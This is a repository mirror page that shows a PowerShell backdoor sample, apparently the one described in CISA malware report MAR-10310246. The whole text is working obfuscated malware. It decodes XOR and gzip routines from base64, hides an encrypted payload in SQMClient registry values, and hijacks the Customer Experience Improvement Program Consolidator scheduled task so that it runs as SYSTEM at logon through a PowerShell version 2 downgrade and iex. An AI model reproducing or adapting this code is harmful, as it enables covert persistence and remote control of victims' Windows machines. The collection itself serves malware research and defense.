Mirrors/Malware-Feed
6
0
Fork 0
mirror of https://github.com/MalwareSamples/Malware-Feed synced 2024-06-27 09:20:22 +00:00
Code Issues Projects Releases Wiki Activity
master
Malware-Feed/2020.10.29_CISA-MAR-10310246_Powershell_Backdoor/134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

102 lines
4.1 MiB
Plaintext
Raw Permalink Normal View History

Initial commit
2020-11-17 00:17:24 +00:00
<EFBFBD><EFBFBD>function TVM730egf([string[]]$GP50afa) { $UC33gfa = ((1..(Get-Random -Min 2 -Max 4) | % {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join '');
$EQ33abh = ((1..(Get-Random -Min 2 -Max 4) | % {[Char](Get-Random -Min 0x30 -Max 0x3A)}) -join '');
$OFK689fa = ((1..(Get-Random -Min 2 -Max 4) | % {[Char](Get-Random -Min 0x61 -Max 0x6B)}) -join '');
$TTG32aa = $UC33gfa + $EQ33abh + $OFK689fa;
if($GP50afa -contains $TTG32aa){$TTG32aa = Get-RandomVar $GP50afa;
} $GP50afa += $TTG32aa;
return $TTG32aa, $GP50afa;
} function PAZ488af { param([string]$BRK627db, [string]$IJV434ghf) try { $KXI603eh = New-Object -ComObject('Schedule.Service');
$KXI603eh.connect('localhost');
$LM625cbg = $KXI603eh.GetFolder($IJV434ghf);
$ZH626hg = $KXI603eh.NewTask($null);
[string]$SV557ebg = [System.IO.Path]::GetTempFileName();
Remove-Item -Path $SV557ebg -Force;
[string]$VD295gbh = [System.IO.Path]::GetFileName($SV557ebg);
$PS061hh = New-Object System.Text.ASCIIEncoding;
$HZ96da = [Convert]::FromBase64String("cHVibGljIHN0YXRpYyBjbGFzcyBSWlA2NDViZXtwdWJsaWMgc3RhdGljIGJ5dGVbXSBYRDAxNGljKGJ5dGVbXSBpbmNvbWVfYnl0ZXMsIGJ5dGVbXSBnYW1tYSl7Ynl0ZVtdIG91dHB1dCA9IG5ldyBieXRlW2luY29tZV9ieXRlcy5MZW5ndGhdO2ZvciAoaW50IGkgPSAwOyBpIDwgaW5jb21lX2J5dGVzLkxlbmd0aDsgKytpKXtvdXRwdXRbaV0gPSAoYnl0ZSkoaW5jb21lX2J5dGVzW2ldIF4gZ2FtbWFbaSAlIGdhbW1hLkxlbmd0aF0pO31yZXR1cm4gb3V0cHV0O319");
$VTC52ii = $PS061hh.GetString($HZ96da, 0, $HZ96da.Length);
try{ Add-Type $VTC52ii -erroraction 'silentlycontinue' } catch{ return;
} $TEX262hh = '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
$HT29hh = [Convert]::FromBase64String($TEX262hh);
$MO67cc = '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
$PVU468aa = [Convert]::FromBase64String($MO67cc);
$GS459ea = "$((1..(Get-Random -Min 8 -Max 10) | % {[Char](Get-Random -Min 0x3A -Max 0x5B)}) -join '')$((1..(Get-Random -Min 5 -Max 8) | % {[Char](Get-Random -Min 0x30 -Max 0x3A)}) -join '')$((1..(Get-Random -Min 8 -Max 10) | %{[Char](Get-Random -Min 0x61 -Max 0x7B)}) -join '')";
[byte[]]$JQ587aa = [RZP645be]::XD014ic($HT29hh, $PS061hh.GetBytes($GS459ea));
[byte[]]$QIG418ba = [RZP645be]::XD014ic($PVU468aa, $PS061hh.GetBytes($GS459ea));
$AT85ced = [Convert]::ToBase64String($JQ587aa);
$ARO88iab = [Convert]::ToBase64String($QIG418ba);
$VP96hb = @();
[string]$PS061hh, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$RPW45dij, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$RIZ505ia, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$HZ96da, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$VTC52ii, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$EQN37bdi, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$MLJ011hei, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$ZFR897jhg, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$LEJ66ih, [string[]]$VP96hb = TVM730egf $VP96hb;
[string]$MP722jg, [string[]]$VP96hb = TVM730egf $VP96hb;
$MP722jg = "HKLM:\SOFTWARE\Microsoft\SQMClient\Windows";
if([System.IntPtr]::Size -eq 4) { $HQO388ea = $AT85ced;
} else { $HQO388ea = $ARO88iab;
} $MTC584bb = "Set-PSBreakpoint -Variable luis_armstrong -Mode Write;
`$$PS061hh = New-Object System.Text.ASCIIEncoding;
`$$RPW45dij = [Convert]::FromBase64String('dXNpbmcgU3lzdGVtO3VzaW5nIFN5c3RlbS5JTzt1c2luZyBTeXN0ZW0uSU8uQ29tcHJlc3Npb247cHVibGljIHN0YXRpYyBjbGFzcyBXUUQ4NWRke3B1YmxpYyBzdGF0aWMgdm9pZCBKWDA2OGNnYShTdHJlYW0gaW5wdXQsIFN0cmVhbSBvdXRwdXQpe2J5dGVbXSBidWZmZXIgPSBuZXcgYnl0ZVsxNiAqIDEwMjRdO2ludCBieXRlc1JlYWQ7d2hpbGUoKGJ5dGVzUmVhZCA9IGlucHV0LlJlYWQoYnVmZmVyLCAwLCBidWZmZXIuTGVuZ3RoKSkgPiAwKXtvdXRwdXQuV3JpdGUoYnVmZmVyLCAwLCBieXRlc1JlYWQpO319fXB1YmxpYyBzdGF0aWMgY2xhc3MgVFVVODhhYWV7cHVibGljIHN0YXRpYyBieXRlW10gQUdJNzRiZChieXRlW10gYXJyYXlUb0NvbXByZXNzKXt1c2luZyAoTWVtb3J5U3RyZWFtIG91dFN0cmVhbSA9IG5ldyBNZW1vcnlTdHJlYW0oKSl7dXNpbmcgKEdaaXBTdHJlYW0gdGlueVN0cmVhbSA9IG5ldyBHWmlwU3RyZWFtKG91dFN0cmVhbSwgQ29tcHJlc3Npb25Nb2RlLkNvbXByZXNzKSl1c2luZyAoTWVtb3J5U3RyZWFtIG1TdHJlYW0gPSBuZXcgTWVtb3J5U3RyZWFtKGFycmF5VG9Db21wcmVzcykpV1FEODVkZC5KWDA2OGNnYShtU3RyZWFtLCB0aW55U3RyZWFtKTtyZXR1cm4gb3V0U3RyZWFtLlRvQXJyYXkoKTt9fXB1YmxpYyBzdGF0aWMgYnl0ZVtdIElIRjYzOGppYihieXRlW10gYXJyYXlUb0RlY29tcHJlc3Mpe3VzaW5nIChNZW1vcnlTdHJlYW0gaW5TdHJlYW0gPSBuZXcgTWVtb3J5U3RyZWFtKGFycmF5VG9EZWNvbXByZXNzKSl1c2luZyAoR1ppcFN0cmVhbSBiaWdTdHJlYW0gPSBuZXcgR1ppcFN0cmVhbShpblN0cmVhbSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpKXVzaW5nIChNZW1vcnlTdHJlYW0gYmlnU3RyZWFtT3V0ID0gbmV3IE1lbW9yeVN0cmVhbSgpKXtXUUQ4NWRkLkpYMDY4Y2dhKGJpZ1N0cmVhbSwgYmlnU3RyZWFtT3V0KTtyZXR1cm4gYmlnU3RyZWFtT3V0LlRvQXJyYXkoKTt9fX0=');
`$$RIZ505ia = `$$PS061hh.GetString(`$$RPW45dij, 0, `$$RPW45dij.Length);
try{ Add-Type `$$RIZ505ia -erroraction 'silentlycontinue' }catch{ return;
}`$$HZ96da = [Convert]::FromBase64String('cHVibGljIHN0YXRpYyBjbGFzcyBSWlA2NDViZXtwdWJsaWMgc3RhdGljIGJ5dGVbXSBYRDAxNGljKGJ5dGVbXSBpbmNvbWVfYnl0ZXMsIGJ5dGVbXSBnYW1tYSl7Ynl0ZVtdIG91dHB1dCA9IG5ldyBieXRlW2luY29tZV9ieXRlcy5MZW5ndGhdO2ZvciAoaW50IGkgPSAwOyBpIDwgaW5jb21lX2J5dGVzLkxlbmd0aDsgKytpKXtvdXRwdXRbaV0gPSAoYnl0ZSkoaW5jb21lX2J5dGVzW2ldIF4gZ2FtbWFbaSAlIGdhbW1hLkxlbmd0aF0pO31yZXR1cm4gb3V0cHV0O319');
`$$VTC52ii = `$$PS061hh.GetString(`$$HZ96da, 0, `$$HZ96da.Length);
try{ Add-Type `$$VTC52ii -erroraction 'silentlycontinue' }catch{ return;
}`$$EQN37bdi = `"$HQO388ea`";
`$$MLJ011hei = [Convert]::FromBase64String(`$$EQN37bdi);
`$$ZFR897jhg = [RZP645be]::XD014ic(`$$MLJ011hei, `$$PS061hh.GetBytes(`$GS459ea));
`$$ZFR897jhg = [TUU88aae]::IHF638jib(`$$ZFR897jhg);
`$$LEJ66ih = `$$PS061hh.GetString(`$$ZFR897jhg, 0, `$$ZFR897jhg.Length);
iex `$$LEJ66ih;
";
Set-ItemProperty -Path $MP722jg -Name "WSqmCons" -Value ([Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes($MTC584bb)));
if(-not(Test-Path($BRK627db))) { $SYL376baa = (Get-ItemProperty -Path $MP722jg).WSqmConBak;
if ($SYL376baa.Length -eq 0){"Fatal error";
return;
} Set-Content -Path $BRK627db -Value $SYL376baa -Encoding Byte;
} $JLF41fe = Get-Item $BRK627db;
[xml]$SYL376baa = Get-Content $JLF41fe.FullName;
[byte[]]$JP844baj = Get-Content $JLF41fe.FullName -encoding Byte;
Set-ItemProperty -Path $MP722jg -Name "WSqmConBak" -Value $JP844baj;
$IKO451jga = $SYL376baa.Task.Triggers.LogonTrigger;
if ("$IKO451jga" -eq "") { $IKO451jga = $SYL376baa.CreateElement('LogonTrigger', $SYL376baa.Task.NamespaceURI);
$RQT625fhi = $SYL376baa.CreateElement('Enabled', $SYL376baa.Task.NamespaceURI);
$RQT625fhi.InnerText = "true";
$IKO451jga.AppendChild($RQT625fhi);
$SYL376baa.Task.Triggers.AppendChild($IKO451jga);
} $DL70iff = $SYL376baa.Task.Actions.Exec.Command;
$YC95gfd = $SYL376baa.Task.Actions.Exec.Arguments;
if("$DL70iff" -ne "cmd.exe") { Set-ItemProperty -Path $MP722jg -Name "WSqmConBin" -Value $DL70iff;
$SYL376baa.Task.Actions.Exec.Command = 'cmd.exe';
if("$YC95gfd" -eq "") { $SYL376baa.Task.Actions.Exec.AppendChild($SYL376baa.CreateElement('Arguments', $SYL376baa.Task.NamespaceURI));
} else { Set-ItemProperty -Path $MP722jg -Name "WSqmConHex" -Value $YC95gfd;
} } else { $DL70iff = (Get-ItemProperty -Path $MP722jg).WSqmConBin;
$YC95gfd = (Get-ItemProperty -Path $MP722jg).WSqmConHex;
} if("$YC95gfd" -ne ""){$YC95gfd += " "};
$ME920bh = "`$GS459ea = '$GS459ea';
[Text.Encoding]::ASCII.GetString([Convert]::\`"Fr``omBa``se6``4Str``ing\`"((gp $MP722jg).WSqmCons))|iex;
";
$SYL376baa.Task.Actions.Exec.Arguments = " /c `"" + $DL70iff + " " + $YC95gfd + "& powershell.exe -v 2 `"$ME920bh`"`"";
$ZH626hg.XmlText = $SYL376baa.OuterXml;
$LM625cbg.RegisterTaskDefinition($JLF41fe.Name, $ZH626hg, 6, 'SYSTEM', $null, 5);
} catch{} Sleep 1;
$(powershell.exe -v 2 "`$GS459ea = '$GS459ea';
[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp $MP722jg).WSqmCons))|iex") } Write-Host "= $XX93ieg =";
if ($XX93ieg -eq "reset"){Write-Output 'Reset';
New-PSDrive -Name HKU -PSProvider Registry -Root Registry::HKEY_USERS | Out-Null;
Foreach($AI66gg in $(Get-ChildItem HKU: | %{if($_.Name -match 'S-\d-\d+-(\d+-){1,14}\d+$'){$Matches[0]}})){$RZB046fcb = "HKU:\$AI66gg\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0";
if (Test-Path $RZB046fcb){Get-Item $RZB046fcb;
$((gp $RZB046fcb).pdk) -join ' ';
Write-Host "Remove $RZB046fcb";
Remove-Item -Path $RZB046fcb -Force;
}}} else{Write-Output 'Normal'} New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0" -Force | Out-Null;
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0" -Name "N" -PropertyType String -Value RTXQ34741eaf | Out-Null;
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{cabe18a5-69b9-4eec-bed0-fa080ed05a3b}\ChannelReferences\0" -Name "S" -PropertyType String -Value ZYYM067dijgg | Out-Null;
PAZ488af 'C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator' 'Microsoft\Windows\Customer Experience Improvement Program';
Remove-Item 'C:\Windows\Temp\tmp4071.tmp'
Reference in New Issue Copy Permalink